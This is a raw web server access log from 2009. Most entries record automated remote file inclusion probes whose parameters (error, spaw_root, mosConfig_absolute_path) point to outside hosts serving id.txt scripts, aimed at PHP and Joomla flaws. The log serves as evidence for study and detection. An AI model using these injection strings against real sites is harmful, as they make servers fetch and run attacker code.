172.16.1.180 - - [05/Aug/2009:06:25:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:06:25:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
74.53.201.178 - - [05/Aug/2009:06:26:22 -0400] "GET /logs/access_log.Q109060800/errors.php?error=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:06:26:30 -0400] "GET /logs/access_log.Q109071400//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
94.23.205.32 - - [05/Aug/2009:06:27:17 -0400] "GET //?option=com_zoom&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:06:27:17 -0400] "GET /logs/access_log.Q109051000//?option=com_zoom&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:06:27:17 -0400] "GET /logs//?option=com_zoom&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12411 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:06:27:41 -0400] "GET /logs/access_log.Q109052700//?option=com_zoom&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
